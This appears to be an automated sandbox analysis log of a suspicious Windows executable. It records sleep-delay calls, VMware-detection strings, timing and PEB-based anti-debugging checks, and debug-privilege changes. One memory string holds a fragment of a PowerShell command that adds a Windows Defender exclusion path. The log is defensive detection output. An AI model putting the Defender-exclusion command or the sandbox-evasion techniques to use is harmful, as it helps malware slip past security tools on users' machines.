Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe Thread delayed: delay time: 240000 Jump to behavior
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe Thread delayed: delay time: 239875 Jump to behavior
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe Thread delayed: delay time: 36459 Jump to behavior
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe Thread delayed: delay time: 239747 Jump to behavior
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe Thread delayed: delay time: 239639 Jump to behavior
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe Thread delayed: delay time: 239530 Jump to behavior
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe Thread delayed: delay time: 239422 Jump to behavior
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe Thread delayed: delay time: 239296 Jump to behavior
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe Thread delayed: delay time: 239187 Jump to behavior
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe Thread delayed: delay time: 239047 Jump to behavior
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe Thread delayed: delay time: 238919 Jump to behavior
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe Thread delayed: delay time: 238796 Jump to behavior
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe Thread delayed: delay time: 238672 Jump to behavior
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe Thread delayed: delay time: 238562 Jump to behavior
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe Thread delayed: delay time: 238452 Jump to behavior
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe Thread delayed: delay time: 238157 Jump to behavior
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe Thread delayed: delay time: 237500 Jump to behavior
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe Thread delayed: delay time: 237359 Jump to behavior
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe Thread delayed: delay time: 237246 Jump to behavior
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe Thread delayed: delay time: 237139 Jump to behavior
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe Thread delayed: delay time: 237031 Jump to behavior
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe Thread delayed: delay time: 236844 Jump to behavior
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe Thread delayed: delay time: 236344 Jump to behavior
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe Thread delayed: delay time: 236109 Jump to behavior
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe Thread delayed: delay time: 235797 Jump to behavior
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe Thread delayed: delay time: 235468 Jump to behavior
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe Thread delayed: delay time: 235355 Jump to behavior
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: cK1g5gckZR9VHjj.exe, 00000000.00000002.357490796.0000000002C9A000.00000004.00000001.sdmp Binary or memory string: VMware SVGA IIBAdd-MpPreference -ExclusionPath "
Source: explorer.exe, 00000005.00000000.389305821.0000000008430000.00000004.00000001.sdmp Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
Source: explorer.exe, 00000005.00000000.389136151.00000000083E0000.00000004.00000001.sdmp Binary or memory string: VMware SATA CD00dRom0
Source: cK1g5gckZR9VHjj.exe, 00000000.00000002.357490796.0000000002C9A000.00000004.00000001.sdmp Binary or memory string: InstallPathJC:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
Source: explorer.exe, 00000005.00000000.384337460.00000000062E0000.00000004.00000001.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: cK1g5gckZR9VHjj.exe, 00000000.00000002.357490796.0000000002C9A000.00000004.00000001.sdmp Binary or memory string: vmware
Source: explorer.exe, 00000005.00000000.389136151.00000000083E0000.00000004.00000001.sdmp Binary or memory string: VMware SATA CD00
Source: explorer.exe, 00000005.00000000.384337460.00000000062E0000.00000004.00000001.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000005.00000000.367328151.00000000082E2000.00000004.00000001.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}>
Source: explorer.exe, 00000005.00000000.367996285.000000000851A000.00000004.00000001.sdmp Binary or memory string: 00000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}||w)
Source: explorer.exe, 00000005.00000000.367996285.000000000851A000.00000004.00000001.sdmp Binary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Vir
Source: explorer.exe, 00000005.00000000.367328151.00000000082E2000.00000004.00000001.sdmp Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000
Source: explorer.exe, 00000005.00000000.389305821.0000000008430000.00000004.00000001.sdmp Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000-;
Source: cK1g5gckZR9VHjj.exe, 00000000.00000002.357490796.0000000002C9A000.00000004.00000001.sdmp Binary or memory string: VMWAREDSOFTWARE\VMware, Inc.\VMware Tools
Source: explorer.exe, 00000005.00000000.358537483.000000000095C000.00000004.00000020.sdmp Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}G
Source: explorer.exe, 00000005.00000000.407240995.000000000D614000.00000004.00000001.sdmp Binary or memory string: dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}$$w

Anti Debugging:

barindex
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe Code function: 2_2_004088D0 rdtsc 2_2_004088D0
Enables debug privileges
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe Process token adjusted: Debug Jump to behavior
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe Process token adjusted: Debug Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe Process token adjusted: Debug Jump to behavior
Contains functionality to read the PEB
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe Code function: 2_2_00FE58EC mov eax, dword ptr fs:[00000030h] 2_2_00FE58EC
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe Code function: 2_2_01004120 mov eax, dword ptr fs:[00000030h] 2_2_01004120
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe Code function: 2_2_01004120 mov eax, dword ptr fs:[00000030h] 2_2_01004120
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe Code function: 2_2_01004120 mov eax, dword ptr fs:[00000030h] 2_2_01004120
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe Code function: 2_2_01004120 mov eax, dword ptr fs:[00000030h] 2_2_01004120
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe Code function: 2_2_01004120 mov ecx, dword ptr fs:[00000030h] 2_2_01004120
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe Code function: 2_2_0101513A mov eax, dword ptr fs:[00000030h] 2_2_0101513A
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe Code function: 2_2_0101513A mov eax, dword ptr fs:[00000030h] 2_2_0101513A
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe Code function: 2_2_0100B944 mov eax, dword ptr fs:[00000030h] 2_2_0100B944
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe Code function: 2_2_0100B944 mov eax, dword ptr fs:[00000030h] 2_2_0100B944
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe Code function: 2_2_00FE9080 mov eax, dword ptr fs:[00000030h] 2_2_00FE9080
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe Code function: 2_2_0100C182 mov eax, dword ptr fs:[00000030h] 2_2_0100C182
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe Code function: 2_2_0101A185 mov eax, dword ptr fs:[00000030h] 2_2_0101A185
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe Code function: 2_2_01012990 mov eax, dword ptr fs:[00000030h] 2_2_01012990
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe Code function: 2_2_010669A6 mov eax, dword ptr fs:[00000030h] 2_2_010669A6
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe Code function: 2_2_010161A0 mov eax, dword ptr fs:[00000030h] 2_2_010161A0
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe Code function: 2_2_010161A0 mov eax, dword ptr fs:[00000030h] 2_2_010161A0
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe Code function: 2_2_010651BE mov eax, dword ptr fs:[00000030h] 2_2_010651BE
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe Code function: 2_2_010651BE mov eax, dword ptr fs:[00000030h] 2_2_010651BE
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe Code function: 2_2_010651BE mov eax, dword ptr fs:[00000030h] 2_2_010651BE
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe Code function: 2_2_010651BE mov eax, dword ptr fs:[00000030h] 2_2_010651BE
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe Code function: 2_2_00FFB02A mov eax, dword ptr fs:[00000030h] 2_2_00FFB02A
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe Code function: 2_2_00FFB02A mov eax, dword ptr fs:[00000030h] 2_2_00FFB02A
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe Code function: 2_2_00FFB02A mov eax, dword ptr fs:[00000030h] 2_2_00FFB02A
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe Code function: 2_2_00FFB02A mov eax, dword ptr fs:[00000030h] 2_2_00FFB02A
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe Code function: 2_2_010741E8 mov eax, dword ptr fs:[00000030h] 2_2_010741E8
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe Code function: 2_2_01067016 mov eax, dword ptr fs:[00000030h] 2_2_01067016
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe Code function: 2_2_01067016 mov eax, dword ptr fs:[00000030h] 2_2_01067016
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe Code function: 2_2_01067016 mov eax, dword ptr fs:[00000030h] 2_2_01067016
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe Code function: 2_2_010B4015 mov eax, dword ptr fs:[00000030h] 2_2_010B4015
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe Code function: 2_2_010B4015 mov eax, dword ptr fs:[00000030h] 2_2_010B4015
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe Code function: 2_2_00FEB1E1 mov eax, dword ptr fs:[00000030h] 2_2_00FEB1E1
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe Code function: 2_2_00FEB1E1 mov eax, dword ptr fs:[00000030h] 2_2_00FEB1E1
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe Code function: 2_2_00FEB1E1 mov eax, dword ptr fs:[00000030h] 2_2_00FEB1E1
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe Code function: 2_2_0101002D mov eax, dword ptr fs:[00000030h] 2_2_0101002D
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe Code function: 2_2_0101002D mov eax, dword ptr fs:[00000030h] 2_2_0101002D
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe Code function: 2_2_0101002D mov eax, dword ptr fs:[00000030h] 2_2_0101002D
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe Code function: 2_2_0101002D mov eax, dword ptr fs:[00000030h] 2_2_0101002D
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe Code function: 2_2_0101002D mov eax, dword ptr fs:[00000030h] 2_2_0101002D
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe Code function: 2_2_01000050 mov eax, dword ptr fs:[00000030h] 2_2_01000050
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe Code function: 2_2_01000050 mov eax, dword ptr fs:[00000030h] 2_2_01000050
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe Code function: 2_2_010A2073 mov eax, dword ptr fs:[00000030h] 2_2_010A2073
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe Code function: 2_2_010B1074 mov eax, dword ptr fs:[00000030h] 2_2_010B1074
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe Code function: 2_2_01063884 mov eax, dword ptr fs:[00000030h] 2_2_01063884
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe Code function: 2_2_01063884 mov eax, dword ptr fs:[00000030h] 2_2_01063884
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe Code function: 2_2_00FEB171 mov eax, dword ptr fs:[00000030h] 2_2_00FEB171
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe Code function: 2_2_00FEB171 mov eax, dword ptr fs:[00000030h] 2_2_00FEB171
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe Code function: 2_2_00FEC962 mov eax, dword ptr fs:[00000030h] 2_2_00FEC962
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe Code function: 2_2_010120A0 mov eax, dword ptr fs:[00000030h] 2_2_010120A0
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe Code function: 2_2_010120A0 mov eax, dword ptr fs:[00000030h] 2_2_010120A0
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe Code function: 2_2_010120A0 mov eax, dword ptr fs:[00000030h] 2_2_010120A0
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe Code function: 2_2_010120A0 mov eax, dword ptr fs:[00000030h] 2_2_010120A0
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe Code function: 2_2_010120A0 mov eax, dword ptr fs:[00000030h] 2_2_010120A0
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe Code function: 2_2_010120A0 mov eax, dword ptr fs:[00000030h] 2_2_010120A0
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe Code function: 2_2_010290AF mov eax, dword ptr fs:[00000030h] 2_2_010290AF
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe Code function: 2_2_0101F0BF mov ecx, dword ptr fs:[00000030h] 2_2_0101F0BF
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe Code function: 2_2_0101F0BF mov eax, dword ptr fs:[00000030h] 2_2_0101F0BF
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe Code function: 2_2_0101F0BF mov eax, dword ptr fs:[00000030h] 2_2_0101F0BF
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe Code function: 2_2_0107B8D0 mov eax, dword ptr fs:[00000030h] 2_2_0107B8D0
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe Code function: 2_2_0107B8D0 mov ecx, dword ptr fs:[00000030h] 2_2_0107B8D0
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe Code function: 2_2_0107B8D0 mov eax, dword ptr fs:[00000030h] 2_2_0107B8D0
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe Code function: 2_2_0107B8D0 mov eax, dword ptr fs:[00000030h] 2_2_0107B8D0
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe Code function: 2_2_0107B8D0 mov eax, dword ptr fs:[00000030h] 2_2_0107B8D0
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe Code function: 2_2_0107B8D0 mov eax, dword ptr fs:[00000030h] 2_2_0107B8D0
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe Code function: 2_2_00FE9100 mov eax, dword ptr fs:[00000030h] 2_2_00FE9100
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe Code function: 2_2_00FE9100 mov eax, dword ptr fs:[00000030h] 2_2_00FE9100
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe Code function: 2_2_00FE9100 mov eax, dword ptr fs:[00000030h] 2_2_00FE9100
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe Code function: 2_2_010A131B mov eax, dword ptr fs:[00000030h] 2_2_010A131B
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe Code function: 2_2_00FFAAB0 mov eax, dword ptr fs:[00000030h] 2_2_00FFAAB0
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe Code function: 2_2_00FFAAB0 mov eax, dword ptr fs:[00000030h] 2_2_00FFAAB0
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe Code function: 2_2_010B8B58 mov eax, dword ptr fs:[00000030h] 2_2_010B8B58
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe Code function: 2_2_00FE52A5 mov eax, dword ptr fs:[00000030h] 2_2_00FE52A5
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe Code function: 2_2_00FE52A5 mov eax, dword ptr fs:[00000030h] 2_2_00FE52A5
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe Code function: 2_2_00FE52A5 mov eax, dword ptr fs:[00000030h] 2_2_00FE52A5
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe Code function: 2_2_00FE52A5 mov eax, dword ptr fs:[00000030h] 2_2_00FE52A5
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe Code function: 2_2_00FE52A5 mov eax, dword ptr fs:[00000030h] 2_2_00FE52A5
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe Code function: 2_2_01013B7A mov eax, dword ptr fs:[00000030h] 2_2_01013B7A
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe Code function: 2_2_01013B7A mov eax, dword ptr fs:[00000030h] 2_2_01013B7A
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe Code function: 2_2_010A138A mov eax, dword ptr fs:[00000030h] 2_2_010A138A
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe Code function: 2_2_0109D380 mov ecx, dword ptr fs:[00000030h] 2_2_0109D380
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe Code function: 2_2_0101B390 mov eax, dword ptr fs:[00000030h] 2_2_0101B390
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe Code function: 2_2_01012397 mov eax, dword ptr fs:[00000030h] 2_2_01012397
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe Code function: 2_2_01014BAD mov eax, dword ptr fs:[00000030h] 2_2_01014BAD
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe Code function: 2_2_01014BAD mov eax, dword ptr fs:[00000030h] 2_2_01014BAD
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe Code function: 2_2_01014BAD mov eax, dword ptr fs:[00000030h] 2_2_01014BAD
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe Code function: 2_2_010B5BA5 mov eax, dword ptr fs:[00000030h] 2_2_010B5BA5
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe Code function: 2_2_00FE9240 mov eax, dword ptr fs:[00000030h] 2_2_00FE9240
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe Code function: 2_2_00FE9240 mov eax, dword ptr fs:[00000030h] 2_2_00FE9240
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe Code function: 2_2_00FE9240 mov eax, dword ptr fs:[00000030h] 2_2_00FE9240
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe Code function: 2_2_00FE9240 mov eax, dword ptr fs:[00000030h] 2_2_00FE9240
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe Code function: 2_2_010653CA mov eax, dword ptr fs:[00000030h] 2_2_010653CA
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe Code function: 2_2_010653CA mov eax, dword ptr fs:[00000030h] 2_2_010653CA
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe Code function: 2_2_010103E2 mov eax, dword ptr fs:[00000030h] 2_2_010103E2
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe Code function: 2_2_010103E2 mov eax, dword ptr fs:[00000030h] 2_2_010103E2
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe Code function: 2_2_010103E2 mov eax, dword ptr fs:[00000030h] 2_2_010103E2
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe Code function: 2_2_010103E2 mov eax, dword ptr fs:[00000030h] 2_2_010103E2
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe Code function: 2_2_010103E2 mov eax, dword ptr fs:[00000030h] 2_2_010103E2
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe Code function: 2_2_010103E2 mov eax, dword ptr fs:[00000030h] 2_2_010103E2
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe Code function: 2_2_00FEAA16 mov eax, dword ptr fs:[00000030h] 2_2_00FEAA16
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe Code function: 2_2_00FEAA16 mov eax, dword ptr fs:[00000030h] 2_2_00FEAA16
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe Code function: 2_2_0100DBE9 mov eax, dword ptr fs:[00000030h] 2_2_0100DBE9
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe Code function: 2_2_00FE5210 mov eax, dword ptr fs:[00000030h] 2_2_00FE5210
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe Code function: 2_2_00FE5210 mov ecx, dword ptr fs:[00000030h] 2_2_00FE5210
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe Code function: 2_2_00FE5210 mov eax, dword ptr fs:[00000030h] 2_2_00FE5210
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe Code function: 2_2_00FE5210 mov eax, dword ptr fs:[00000030h] 2_2_00FE5210
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe Code function: 2_2_00FF8A0A mov eax, dword ptr fs:[00000030h] 2_2_00FF8A0A
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe Code function: 2_2_01003A1C mov eax, dword ptr fs:[00000030h] 2_2_01003A1C
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe Code function: 2_2_01024A2C mov eax, dword ptr fs:[00000030h] 2_2_01024A2C
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe Code function: 2_2_01024A2C mov eax, dword ptr fs:[00000030h] 2_2_01024A2C
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe Code function: 2_2_01074257 mov eax, dword ptr fs:[00000030h] 2_2_01074257
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe Code function: 2_2_010AEA55 mov eax, dword ptr fs:[00000030h] 2_2_010AEA55
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe Code function: 2_2_0109B260 mov eax, dword ptr fs:[00000030h] 2_2_0109B260
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe Code function: 2_2_0109B260 mov eax, dword ptr fs:[00000030h] 2_2_0109B260
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe Code function: 2_2_010B8A62 mov eax, dword ptr fs:[00000030h] 2_2_010B8A62
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe Code function: 2_2_00FF1B8F mov eax, dword ptr fs:[00000030h] 2_2_00FF1B8F
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe Code function: 2_2_00FF1B8F mov eax, dword ptr fs:[00000030h] 2_2_00FF1B8F
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe Code function: 2_2_0102927A mov eax, dword ptr fs:[00000030h] 2_2_0102927A
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe Code function: 2_2_0101D294 mov eax, dword ptr fs:[00000030h] 2_2_0101D294
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe Code function: 2_2_0101D294 mov eax, dword ptr fs:[00000030h] 2_2_0101D294
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe Code function: 2_2_00FEDB60 mov ecx, dword ptr fs:[00000030h] 2_2_00FEDB60
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe Code function: 2_2_00FEF358 mov eax, dword ptr fs:[00000030h] 2_2_00FEF358
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe Code function: 2_2_0101FAB0 mov eax, dword ptr fs:[00000030h] 2_2_0101FAB0
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe Code function: 2_2_00FEDB40 mov eax, dword ptr fs:[00000030h] 2_2_00FEDB40
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe Code function: 2_2_01012ACB mov eax, dword ptr fs:[00000030h] 2_2_01012ACB
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe Code function: 2_2_01012AE4 mov eax, dword ptr fs:[00000030h] 2_2_01012AE4
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe Code function: 2_2_0106A537 mov eax, dword ptr fs:[00000030h] 2_2_0106A537
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe Code function: 2_2_010AE539 mov eax, dword ptr fs:[00000030h] 2_2_010AE539
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe Code function: 2_2_01014D3B mov eax, dword ptr fs:[00000030h] 2_2_01014D3B
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe Code function: 2_2_01014D3B mov eax, dword ptr fs:[00000030h] 2_2_01014D3B
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe Code function: 2_2_01014D3B mov eax, dword ptr fs:[00000030h] 2_2_01014D3B
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe Code function: 2_2_010B8D34 mov eax, dword ptr fs:[00000030h] 2_2_010B8D34
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe Code function: 2_2_01023D43 mov eax, dword ptr fs:[00000030h] 2_2_01023D43
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe Code function: 2_2_01063540 mov eax, dword ptr fs:[00000030h] 2_2_01063540
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe Code function: 2_2_01007D50 mov eax, dword ptr fs:[00000030h] 2_2_01007D50
